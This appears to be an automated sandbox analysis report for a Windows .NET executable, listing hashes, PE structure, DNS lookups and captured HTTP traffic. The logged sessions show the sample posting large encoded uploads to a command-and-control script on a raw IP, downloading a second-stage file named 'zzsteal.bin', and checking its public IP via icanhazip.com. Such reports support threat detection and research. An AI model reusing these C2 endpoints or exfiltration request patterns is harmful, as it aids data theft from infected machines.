Preview:	L..................F.@.. ...$+.,.......`....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X\c....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X\c....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X\c....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X\c..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X`c...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.235868714087531
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	HTZ4az17lj.exe
File size:	69'136 bytes
MD5:	ceb9e6829d00ad6e8f25b30d77aba83f
SHA1:	865128c3a9baee65deeab14f1fdc9a68969df6f4
SHA256:	664582c7357c0ea9f0f6ab524867e1cce887251b11e917ba5c9d81247e57bcb1
SHA512:	18703d353319cbd049dfe3d19469eef2ef26615e44101eca43d1c7da515553d2c98e8098e5d2cfbf1c32984d77846dec320223ea4b8189ca9f64d570e7ea0ca2
SSDEEP:	1536:j+wPW51r8EHsL71ELMt/RYKiq4vo/1oHHbwr/Ye2WcMX6F8:j+wIiEH+u4/O1HHbwse2SXE8
TLSH:	BA639D207FDA9118E1FBDE74DAE3756282BDE9531907B94648E2741A0E321C0ABC3D76
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....t.e.........."...0.................. .....@..... .......................@............`...@......@............... .....

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65F17402 [Wed Mar 13 09:38:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x2c0e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdcf0	0xde00	1b8a4589840bbee97e57ab83182c5d38	False	0.6636577984234234	data	6.200437900563891	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x2c0e	0x2e00	79b205bbdbd93f5b769e371d400ded5b	False	0.30765964673913043	data	4.948509204730363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x10130	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.29896265560165974
RT_GROUP_ICON	0x126d8	0x14	data	1.15
RT_VERSION	0x126ec	0x336	data	0.4233576642335766
RT_MANIFEST	0x12a24	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 16, 2024 14:26:57.706106901 CEST	53	50632	1.1.1.1	192.168.2.5
Apr 16, 2024 14:26:57.776402950 CEST	53	51801	1.1.1.1	192.168.2.5
Apr 16, 2024 14:26:58.457706928 CEST	53	65167	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:01.520479918 CEST	56964	53	192.168.2.5	1.1.1.1
Apr 16, 2024 14:27:01.626605034 CEST	53	56964	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:01.637831926 CEST	64934	53	192.168.2.5	1.1.1.1
Apr 16, 2024 14:27:01.742553949 CEST	53	64934	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:02.033514023 CEST	50661	53	192.168.2.5	1.1.1.1
Apr 16, 2024 14:27:02.134079933 CEST	52136	53	192.168.2.5	1.1.1.1
Apr 16, 2024 14:27:02.134196043 CEST	54345	53	192.168.2.5	1.1.1.1
Apr 16, 2024 14:27:02.238817930 CEST	53	52136	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:02.238843918 CEST	53	54345	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:02.326728106 CEST	53	50661	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:04.788045883 CEST	55444	53	192.168.2.5	1.1.1.1
Apr 16, 2024 14:27:04.892520905 CEST	53	55444	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:15.456516981 CEST	53	59727	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:34.457050085 CEST	53	51997	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:57.089466095 CEST	53	52954	1.1.1.1	192.168.2.5
Apr 16, 2024 14:27:57.521713018 CEST	53	64491	1.1.1.1	192.168.2.5
Apr 16, 2024 14:28:27.098809958 CEST	53	59645	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Apr 16, 2024 14:26:54.309864998 CEST	662	OUT	POST /XtfcshEgt/upwawsfrg.php HTTP/1.1 Cookie: SESSION=Gcj+h91LeJxqEAdq3hlnr5vILKnhsk514dxtp+No3JD7QBgj4catKb4KZZoEe7n0ZQHfUqB4+LRcnLZpCNm+vlRVwAlzuGF/Ogb31zT1/J+v/tG52kIlGXwrBCWsk0XIUZPNK8kN4FIXgHizyKTrvIpZz3YVByuSV3l6JFK2KVQP4VecvhvlHdWlS3UQ3xdHQ8j9KcN4s7UAumu1CgmZyH0yDEijiEEFO2qYchSihH2HLA6McZ2qghDxmjavG0Wz3soCffYWADkZqOeAv4RewsFkOlVJuf/SiScZljMLny+gsCdQWKnRqXZJPmRDp5DQsAH7VTTYRrINKSibONStNYaRZFHiK6XnbaEMnI6z Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0 Host: 128.199.113.162 Content-Length: 140139 Expect: 100-continue Connection: Keep-Alive
Apr 16, 2024 14:26:54.639800072 CEST	25	IN	HTTP/1.1 100 Continue
Apr 16, 2024 14:26:54.640976906 CEST	12890	OUT	Data Raw: 4e 61 6d 65 3d 4d 50 47 76 6d 5a 70 49 26 64 61 74 61 46 69 6c 65 3d 76 45 6f 69 48 50 38 32 55 37 6c 43 4d 6d 4d 5a 25 32 66 53 4a 46 69 74 69 53 61 70 30 6b 4b 77 77 4d 31 4f 4e 52 6b 61 42 55 6d 71 48 65 61 7a 31 66 6d 36 76 56 61 38 74 71 44 Data Ascii: Name=MPGvmZpI&dataFile=vEoiHP82U7lCMmMZ%2fSJFitiSap0kKwwM1ONRkaBUmqHeaz1fm6vVa8tqDLM1VcGKEGGlPJhLxMQn48IgQpLX%2fxscwS9NomRgIwX1wSzjrOvAppv4jwN4D3T2kkyM4COyN%2fmyB4Zpgy5K1heytML5uJZZ030VBSmOVWlkNAP0bihcvgCMtgueQZPyFW9wxAU2HoiqM6UHqLUSywnSGA1QOE
Apr 16, 2024 14:26:54.971576929 CEST	24491	OUT	Data Raw: 39 71 79 4b 51 72 33 48 4e 4c 56 35 77 37 79 34 6d 5a 7a 4d 73 58 71 30 51 6b 65 34 70 4a 46 47 48 4f 69 49 33 41 41 65 72 6b 31 6e 25 32 62 6c 36 52 6d 38 47 34 64 37 50 43 25 32 62 79 32 58 66 62 73 6d 61 4f 71 6f 61 55 48 58 6a 64 4d 5a 37 52 Data Ascii: 9qyKQr3HNLV5w7y4mZzMsXq0Qke4pJFGHOiI3AAerk1n%2bl6Rm8G4d7PC%2by2XfbsmaOqoaUHXjdMZ7RlMf9ZFEZ4U%2bDJdpx6%2fNFGqr4EUOmOxnktJOlT6FUxvdAHJx5Q3oti5%2bbsLjpxVCUqE7O4AUA5iqmU7Pi6MfBAXcUfxzsuQKCDxC4POmLAlJ8WJ4Oi1d3ZojK0nlUs9nBvo17Pb%2bvQZDTfbEgjLrFhY0j5
Apr 16, 2024 14:26:55.301511049 CEST	48982	OUT	Data Raw: 33 35 6b 56 49 47 59 4f 32 36 71 62 61 43 53 6e 53 59 51 4c 61 56 43 71 35 6b 45 4c 6c 59 45 42 35 7a 49 62 48 77 68 65 66 52 58 53 55 34 70 6a 59 47 4a 45 57 4c 69 39 76 5a 58 52 31 64 25 32 62 66 37 25 32 62 34 36 6b 33 53 57 62 4f 77 53 52 45 Data Ascii: 35kVIGYO26qbaCSnSYQLaVCq5kELlYEB5zIbHwhefRXSU4pjYGJEWLi9vZXR1d%2bf7%2b46k3SWbOwSREg7BZGUtz3Q7j2NhE8z6WOpSwPT8geAcDvO3W6ev0OsXvAq1L1eOrMHQhbKOUgyqbyVmiGht7jWgypKes097sDKe1YFAtnWAd5mUcXbiKbmRskzM%2bqaasL4ii7mtZzL5oKU5c1rI8O1SDBhkYqw3N%2blFmpunp9
Apr 16, 2024 14:26:55.631191015 CEST	43826	OUT	Data Raw: 37 4f 38 75 42 70 64 4b 33 4b 36 56 73 33 62 66 36 44 6e 73 39 59 36 41 45 48 6f 69 46 59 46 56 78 38 69 37 44 62 78 73 69 71 6d 41 5a 32 4b 6a 64 35 4e 69 36 4b 6a 50 4e 61 44 52 4b 33 36 64 35 34 44 69 72 5a 75 30 61 53 75 52 70 6f 57 6d 77 69 Data Ascii: 7O8uBpdK3K6Vs3bf6Dns9Y6AEHoiFYFVx8i7DbxsiqmAZ2Kjd5Ni6KjPNaDRK36d54DirZu0aSuRpoWmwiHjw8qy3wFECov%2fomOZIym%2fB4gCIPsy02k1fv7TgS0GSJpRDcugpfkVKZw2DlUrXTMbKdxHO4qWTL2E2L%2fuzaeeXsVW2Nli7IKAxvUVeMtREjwwC9W9XBo24yT1R507DKIMYSU1D32WhBuYsdGIAIr5eOrTT
Apr 16, 2024 14:26:55.631364107 CEST	5156	OUT	Data Raw: 53 77 47 47 43 69 63 79 6d 56 54 4d 79 46 61 6e 4e 42 59 74 76 48 42 6d 54 61 71 4a 48 70 73 73 6e 50 7a 5a 6b 4c 65 6e 4f 4d 38 78 57 58 4d 50 42 79 45 65 61 7a 55 78 4d 41 47 63 38 68 35 39 71 4c 50 30 44 76 6e 51 46 79 7a 63 55 38 6d 6e 38 53 Data Ascii: SwGGCicymVTMyFanNBYtvHBmTaqJHpssnPzZkLenOM8xWXMPByEeazUxMAGc8h59qLP0DvnQFyzcU8mn8SW0bQqafJ%2bKkqxA3ctmZSLqg58HcWmhT%2fSLtdO9gqKK%2bU0uKeIooOIfSJgtWmx2N04c9feWOvt9s9Blp4f25P6F%2bc8i%2fiK73X7J7PwZM050lKI0Hk25ZT%2frXAhjxmK77jdwcWEP%2b1FHD4%2fCTub
Apr 16, 2024 14:26:55.631474018 CEST	4794	OUT	Data Raw: 42 35 55 7a 49 38 52 48 4b 71 6f 54 35 76 49 4d 56 4c 6b 6a 56 52 4a 64 46 5a 67 4d 44 4f 4c 78 49 25 32 66 34 64 25 32 62 42 36 78 48 6a 48 6c 42 66 6b 43 78 47 32 70 64 4a 6e 58 32 41 46 6c 51 75 63 78 4b 50 52 75 49 34 71 42 34 6b 33 78 65 79 Data Ascii: B5UzI8RHKqoT5vIMVLkjVRJdFZgMDOLxI%2f4d%2bB6xHjHlBfkCxG2pdJnX2AFlQucxKPRuI4qB4k3xeyK1%2bqVmcRw1sUz5y8BMWhsoliUlxSHJZf%2fLTzxyI2685USiVy2ykw4lsnixnPXjphIdyZ2LasbB0%2fQ8iLMqdGxSUntNGY7pxcaheRNXobLUVxGIxJDlQk0zb01Sk5AFtkpbtZhwlu8Gq2vXfpcbaKhWCcSqp
Apr 16, 2024 14:26:55.959554911 CEST	1289	OUT	Data Raw: 6d 54 76 37 75 6a 63 75 6a 52 52 54 35 72 37 6d 7a 50 33 56 79 25 32 66 59 37 64 25 32 62 63 47 71 55 78 47 44 56 55 55 4f 56 43 39 4d 73 59 41 6f 50 25 32 66 55 36 62 70 43 61 6a 25 32 66 46 6e 5a 36 68 49 55 38 51 52 25 32 66 38 51 61 37 5a 69 Data Ascii: mTv7ujcujRRT5r7mzP3Vy%2fY7d%2bcGqUxGDVUUOVC9MsYAoP%2fU6bpCaj%2fFnZ6hIU8QR%2f8Qa7ZiXxRCs90EEv1Tl6TTQsTkn3wAUWKqhU9sxW4r0lQ2UgmFzRtm%2baYwtPtj3N88RBQ1PjyZbavrnWedfk40c8JFUgsADMtcs9neNDWSNha0xnnIQfC4IEfXqIlUguecxB4Ql4TJvkfr16gxoagEvrmgZihBCAYsNJM
Apr 16, 2024 14:26:56.209821939 CEST	207	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:26:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 38 3d 3d 33 Data Ascii: 8==3
Apr 16, 2024 14:26:57.711249113 CEST	547	OUT	GET /XtfcshEgt/upwawsfrg.php?zd=1 HTTP/1.1 Cookie: SESSION=Gcj+h91LeJxqEAdq3hlnr5vILKnhsk514dxtp+No3JD7QBgj4catKb4KZZoEe7n0ZQHfUqB4+LRcnLZpCNm+vlRVwAlzuGF/Ogb31zT1/J+v/tG52kIlGXwrBCWsk0XIUZPNK8kN4FIXgHizyKTrvIpZz3YVByuSV3l6JFK2KVQP4VecvhvlHdWlS3UQ3xdHQ8j9KcN4s7UAumu1CgmZyH0yDEijiEEFO2qYchSihH2HLA6McZ2qghDxmjavG0Wz3soCffYWADkZqOeAv4RewsFkOlVJuf/SiScZljMLny+gsCdQWKnRqXZJPmRDp5DQsAH7VTTYRrINKSibONStNYaRZFHiK6XnbaEMnI6z User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0 Host: 128.199.113.162
Apr 16, 2024 14:26:58.250277042 CEST	365	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:26:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Description: File Transfer Content-Disposition: attachment; filename=zzsteal.bin Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public Content-Length: 323584 Content-Type: application/octet-stream
Apr 16, 2024 14:26:58.250469923 CEST	1289	IN	Data Raw: 44 73 68 4e 2f 50 77 6d 47 66 38 50 64 47 4d 59 41 39 78 46 36 6d 44 79 61 70 33 62 38 41 78 50 6c 4f 74 58 6c 36 64 53 6e 36 6e 5a 62 44 70 57 6b 71 50 66 5a 39 39 6e 41 4c 67 2b 57 64 69 59 41 32 36 78 49 59 4a 55 32 74 6b 39 2f 39 34 41 35 72 Data Ascii: DshN/PwmGf8PdGMYA9xF6mDyap3b8AxPlOtXl6dSn6nZbDpWkqPfZ99nALg+WdiYA26xIYJU2tk9/94A5rzw3zcvWD1RPlqELo3FudX256SQ6IO6wUIsSSdkaS+uj0TUStXbbr4W+1hYnmWzwr+YqskEhSoJOha2Q1tWBjHGXBo+yTK+yDivc8rHMztC9jcELLqYAXc1mIYr+DDgKpWs+E0aTGiRpnU1teTTCDauphr3uUPtHPj
Apr 16, 2024 14:26:58.250489950 CEST	1289	IN	Data Raw: 55 44 46 68 33 6b 46 50 76 59 46 6b 4a 4b 7a 42 48 4e 62 68 51 45 78 7a 72 34 51 45 4b 74 31 6f 50 6c 6b 56 2f 64 34 56 47 77 52 6c 63 74 38 50 4e 70 79 35 52 55 2b 68 36 58 4d 4f 76 62 79 49 59 53 33 69 6f 49 47 44 2b 77 56 76 4c 67 61 62 36 61 Data Ascii: UDFh3kFPvYFkJKzBHNbhQExzr4QEKt1oPlkV/d4VGwRlct8PNpy5RU+h6XMOvbyIYS3ioIGD+wVvLgab6aLsqBT9WcI04i1YLlEOLA6vuw4zzq7pMxzGQ7uJXRWNSqW5fEtnue5a9oGp+eytcjoJpb7SI88tnF4/BNk5e0popOybsZ0ExEQrefkp3N35jsbNdGO665d5OLomCXD1r14MjoEddU4XgS5NDtwRzzvGpCm+T15R7ac
Apr 16, 2024 14:26:58.250500917 CEST	1289	IN	Data Raw: 63 62 63 4a 46 4a 4d 4b 6c 69 34 4b 6e 4b 2b 52 47 79 39 68 66 55 69 73 39 44 72 4c 76 48 55 50 79 58 72 69 4c 72 4f 41 64 6a 4d 4c 52 4d 77 50 43 5a 31 4d 71 6b 4f 75 35 64 75 56 33 41 36 62 73 74 69 66 2b 2b 76 45 42 66 4c 76 6d 67 59 50 42 62 Data Ascii: cbcJFJMKli4KnK+RGy9hfUis9DrLvHUPyXriLrOAdjMLRMwPCZ1MqkOu5duV3A6bstif++vEBfLvmgYPBbz8La0jD/Uctx9428Ps2+TccmrSjTo4Jawe4lMxtzRK+vsdElPhGvJp6iBDJJMluE4G784Pfub6Rgs/3syP0fhpV6cTM1+vCbiUzTJcNyVvDaJMHhASuBizknd+LhMhvRJaUaECPjXobdOaEGKCLr0N9S4RM15dm3D

Timestamp	Bytes transferred	Direction	Data
Apr 16, 2024 14:27:01.849190950 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Apr 16, 2024 14:27:01.975649118 CEST	535	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:27:01 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=oumrZ3FCN9UyRiHKkeEv_nTo9YEs2w575QsUJBF7Fcs-1713270421-1.0.1.1-WMmrLe9N9_hISQfwiOtWNJzrm1KDz_57e2egSgSyzQAQd4RrVF99.64AZvRXkuGJqU8Gth3ezTdg8AbRSMPW9Q; path=/; expires=Tue, 16-Apr-24 12:57:01 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 87542ac8dcb7452c-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32 0a Data Ascii: 81.181.57.52

Timestamp	Bytes transferred	Direction	Data
Apr 16, 2024 14:27:02.036804914 CEST	662	OUT	POST /XtfcshEgt/upwawsfrg.php HTTP/1.1 Cookie: SESSION=Gcj+h91LeJxqEAdq3hlnr5vILKnhsk514dxtp+No3JD7QBgj4catKb4KZZoEe7n0ZQHfUqB4+LRcnLZpCNm+vlRVwAlzuGF/Ogb31zT1/J+v/tG52kIlGXwrBCWsk0XIUZPNK8kN4FIXgHizyKTrvIpZz3YVByuSV3l6JFK2KVQP4VecvhvlHdWlS3UQ3xdHQ8j9KcN4s7UAumu1CgmZyH0yDEijiEEFO2qYchSihH2HLA6McZ2qghDxmjavG0Wz3soCffYWADkZqOeAv4RewsFkOlVJuf/SiScZljMLny+gsCdQWKnRqXZJPmRDp5DQsAH7VTTYRrINKSibONStNYaRZFHiK6XnbaEMnI6z Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0 Host: 128.199.113.162 Content-Length: 196277 Expect: 100-continue Connection: Keep-Alive
Apr 16, 2024 14:27:02.350637913 CEST	25	IN	HTTP/1.1 100 Continue
Apr 16, 2024 14:27:02.351074934 CEST	12890	OUT	Data Raw: 4e 61 6d 65 3d 4d 50 47 76 6d 5a 70 49 26 64 61 74 61 46 69 6c 65 3d 76 45 6f 69 48 50 38 32 55 37 6c 43 4d 6d 4d 5a 25 32 66 53 4a 46 69 74 69 53 61 70 30 6b 4b 77 77 4d 31 4f 4e 52 6b 61 42 55 6d 71 48 65 61 7a 31 66 6d 36 76 56 61 38 74 71 44 Data Ascii: Name=MPGvmZpI&dataFile=vEoiHP82U7lCMmMZ%2fSJFitiSap0kKwwM1ONRkaBUmqHeaz1fm6vVa8tqDLM1VcGKEGGlPJhLxMQn48IgQpLX%2fxscwS9NomRgIwX1wSzjrOvAppv4jwN4D3T2kkyM4COyN%2fmyB4Zpgy5K1heytML5uJZZ030VBSmOVWlkNAP0bihcvgCMtgueQZPyFW9wxAU2HoiqM6UHqLUSywnSGA1QOE
Apr 16, 2024 14:27:02.667795897 CEST	25780	OUT	Data Raw: 48 6a 65 46 36 46 47 31 67 56 48 38 70 36 70 77 32 30 5a 71 61 38 6e 25 32 66 52 51 4c 71 35 58 4d 32 41 25 32 66 6e 67 6c 25 32 66 58 6c 31 6c 25 32 66 34 51 32 4c 4f 56 34 70 75 65 45 55 55 37 4b 4e 79 25 32 62 73 73 56 36 66 45 6b 44 32 66 36 Data Ascii: HjeF6FG1gVH8p6pw20Zqa8n%2fRQLq5XM2A%2fngl%2fXl1l%2f4Q2LOV4pueEUU7KNy%2bssV6fEkD2f6jtO9rL3jUDljYwpvhxd5IMQPKdt%2fBUZ6lp4qWZYmS6yIpCsGGqy9joNaTvpLaJT2GOSL6LvbyGu0tqf70Z3l7tLMvzD7CtU%2f3aF4FiU0F0JzHLgbxtcGGfl7mPzjK5zjAVUSbaWMt%2bgceZU9r4%2bwKojvA
Apr 16, 2024 14:27:02.981502056 CEST	2578	OUT	Data Raw: 25 32 62 5a 4c 43 59 53 78 53 36 48 6f 43 39 37 52 32 4b 5a 42 67 62 34 54 39 72 64 4e 58 36 35 63 49 56 73 58 69 55 4c 66 72 52 6d 78 4b 44 49 6d 54 48 33 34 70 73 6b 4a 6f 34 66 56 70 30 35 55 46 54 73 4a 66 4c 25 32 66 5a 71 52 76 6a 78 4c 39 Data Ascii: %2bZLCYSxS6HoC97R2KZBgb4T9rdNX65cIVsXiULfrRmxKDImTH34pskJo4fVp05UFTsJfL%2fZqRvjxL9KLdRmdaYdiKyJlSSR8cbdgjQ4pH4bqVzA%2fiNUa%2bo8%2bB%2fLtOmZpQVvm2Izep0trJRoHAGQFU4uH8QixdAWweH2cE3Ym6IdKV1A8IsXaOox4PjFkf9Usr4UFIuxD3SBIbm5z6Z3dpysyMwVog8BMC0y1%2b
Apr 16, 2024 14:27:02.981739044 CEST	20624	OUT	Data Raw: 6d 68 63 59 7a 4f 49 6e 64 51 42 4a 4d 54 7a 67 63 45 78 50 34 31 79 65 39 52 4d 55 78 43 78 78 70 37 70 37 63 25 32 62 33 59 42 46 51 33 50 25 32 62 4b 25 32 66 38 36 75 32 7a 25 32 62 38 76 63 66 65 74 51 58 78 7a 51 72 53 45 57 4d 49 58 58 5a Data Ascii: mhcYzOIndQBJMTzgcExP41ye9RMUxCxxp7p7c%2b3YBFQ3P%2bK%2f86u2z%2b8vcfetQXxzQrSEWMIXXZ5GJtAIMhm3sJVCTiQAHaZCUMt2kBa42YR7Sqxpq1yP0RJqLpbk89PIOvdbjNJRHy8Zxsk1SVlAttqyJpK3kR77ZKDWTmJEYrh1bJ%2f1eRgd5Zv%2fahSJcnmPhGcgQDcxvaX%2f8K%2fo5A1u%2f9gTd8zioWWwG
Apr 16, 2024 14:27:02.982031107 CEST	24491	OUT	Data Raw: 58 67 74 4e 32 4e 59 65 66 4b 73 38 56 74 4a 7a 57 25 32 66 54 5a 36 73 6a 4d 62 4c 25 32 62 39 76 36 53 4f 70 7a 71 74 32 74 52 59 25 32 66 4c 78 69 65 6c 4f 6c 67 69 38 37 5a 66 43 66 4d 79 7a 56 41 75 49 36 6a 5a 6e 6e 6f 4a 41 58 6b 33 4a 7a Data Ascii: XgtN2NYefKs8VtJzW%2fTZ6sjMbL%2b9v6SOpzqt2tRY%2fLxielOlgi87ZfCfMyzVAuI6jZnnoJAXk3JzsTKl1e52EL6gIGR%2btkleOJKg7hr2fzV8VLXvgASpAu4xNMmEqVBOCOTl5K5as8GnyT%2bJGS518HSpdr2H7GhltLoYPBGjIX54VCNNdLEQoPBDKsl0V9C0f855bdypdoB1vWutd4IHuzN3cwOHuJOZaCwwStXaJ
Apr 16, 2024 14:27:03.295489073 CEST	7734	OUT	Data Raw: 41 30 67 79 6f 5a 63 75 78 39 78 6d 4a 51 72 25 32 62 71 77 59 6b 67 51 79 6b 44 62 6f 38 75 62 6a 4c 6e 34 61 67 37 30 49 56 6e 70 68 6b 45 53 56 66 51 43 79 57 77 30 53 33 67 70 6a 4f 46 73 47 58 4a 33 73 64 41 76 44 62 73 25 32 66 57 73 46 74 Data Ascii: A0gyoZcux9xmJQr%2bqwYkgQykDbo8ubjLn4ag70IVnphkESVfQCyWw0S3gpjOFsGXJ3sdAvDbs%2fWsFtITKwdIrVAsZs0BftWpjkciZpwOarRSA61m0HNn539xB%2bQnof1XiLQosmMw4OaQTA0aQJLkm3I1Lt%2bL0BmtOWjJGCEGBgU1P6IfLmAR6igs8x1cXND6m5JjCIco5WmYgi2Zm3mU%2fvXyy%2b61lFtfv3HttKP
Apr 16, 2024 14:27:03.295681000 CEST	23202	OUT	Data Raw: 36 4f 6a 33 61 5a 42 39 70 45 4a 34 51 4c 6e 76 78 57 51 57 4d 42 67 50 41 25 32 62 65 57 6c 73 35 30 4f 6f 6b 47 6e 4f 70 48 6b 76 61 72 77 59 38 6b 77 69 7a 63 41 34 41 49 65 69 43 6f 25 32 66 50 4b 52 6a 36 35 6f 6d 79 30 58 66 32 58 50 53 63 Data Ascii: 6Oj3aZB9pEJ4QLnvxWQWMBgPA%2beWls50OokGnOpHkvarwY8kwizcA4AIeiCo%2fPKRj65omy0Xf2XPSc%2f5RUqcwuJblRd5mcd74FkZxGImTTidXTNU0M4HlE3AIpEQlbRKrKT1lmmcgP1UWE74zXo5zum0QJ2y7DKQnHpbnhQOs4Ouzybu%2f6VT01XCX8qiNE3B8sm3lwsSTMF4T1zUniG5oPoDerF9iKMZQdtVARbaJxF
Apr 16, 2024 14:27:03.296210051 CEST	52849	OUT	Data Raw: 66 30 32 52 47 65 69 36 4c 34 55 6b 45 36 41 57 47 4b 64 4f 5a 45 44 36 57 31 32 6a 71 4e 39 41 58 35 6f 63 6a 41 6e 42 49 6c 74 65 59 75 64 36 57 35 4c 25 32 66 57 35 25 32 62 79 36 65 50 5a 4e 78 78 4e 52 35 55 72 52 67 4e 39 77 64 6f 32 4b 30 Data Ascii: f02RGei6L4UkE6AWGKdOZED6W12jqN9AX5ocjAnBIlteYud6W5L%2fW5%2by6ePZNxxNR5UrRgN9wdo2K08N6uZuVK%2b5DpRG6F99JGPpNXSPz%2bT%2f70uGYWtnAB5YA%2fxCTPxgAtXA28tTWcGQzOG%2f834247q9FDoWpeRgyj%2fyIL%2bt4WDlEsD4Qll88r4y9%2fac6WqsAUl5YGgtIyTkB6lO5u3w72rfpZhKrc%
Apr 16, 2024 14:27:03.609350920 CEST	2578	OUT	Data Raw: 31 72 25 32 66 61 49 42 62 51 25 32 66 6d 4f 35 42 35 6f 71 5a 47 32 4e 4d 71 49 74 4a 7a 67 6d 7a 4c 74 68 4d 4a 71 77 34 57 57 63 25 32 62 63 51 6d 32 79 30 44 36 37 47 69 37 73 39 48 44 5a 6b 33 46 76 54 45 6a 62 50 6d 54 38 6a 32 54 63 35 25 Data Ascii: 1r%2faIBbQ%2fmO5B5oqZG2NMqItJzgmzLthMJqw4WWc%2bcQm2y0D67Gi7s9HDZk3FvTEjbPmT8j2Tc5%2fWxJuU3L%2bXisCfIfy5r7msLfpN%2fwTUjReq5dVqbrtrGR6TnPcnD47%2bAKxSpzHV3c40S3ws8w2PHa3GuYk8jtzFwZE6TqMkTDmepvCAvn%2ftdhUDdNq41FuQOpTlfkmnK18%2f8GJsITxVw4l0OmAOxn3u
